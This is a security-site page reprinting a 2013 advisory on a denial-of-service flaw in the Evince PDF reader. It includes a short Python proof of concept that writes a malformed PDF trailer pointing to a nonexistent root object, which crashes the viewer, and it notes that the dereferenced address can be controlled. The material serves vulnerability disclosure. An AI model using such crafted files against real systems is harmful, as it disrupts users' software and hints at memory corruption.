首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Evince PDF Reader 2.32.0.145 / 3.4.0 Denial Of Service
来源:vfocus.net 作者:Deva 发布时间:2013-10-08  
Advisory Information :
======================
Title : Evince 2.32.0.145 - Denial Of Service
Product : Evince pdf reader
Vendor Homepage: https://projects.gnome.org/evince/
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior release
Tested Version : Windows 2.32.0.145, Linux 3.4.0
Tested On : Windows 7 & 8, Ubuntu 13.04
Discovered By : Deva, Securimag Team
  
Introduction :
==============
Evince is a document viewer for multiple document formats.
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.
  
- Copied from : https://projects.gnome.org/evince/
 
Proof Of Concept :
==================
You can control dereferenced address by changing value of /Root (here 42)
 
#!/usr/bin/python
 
pdf = """trailer
<<
/Size 1337
/Root 42 0 R
>>
startxref
1
%%EOF
"""
  
filename = "EvincePoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD Intel SYSRET Kernel Pr
·Ice Cold Apps Servers Ultimate
·SIEMENS Solid Edge ST4 SEListC
·Apple Motion 5.0.7 Integer Ove
·Apache Tomcat/JBoss EJBInvoker
·FlashChat Arbitrary File Uploa
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·ClipBucket Remote Code Executi
·Internet Explorer 7.0 "documen
·GestioIP Remote Command Execut
·Internet Explorer "wshom.ocx"
·HP LoadRunner magentproc.exe O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved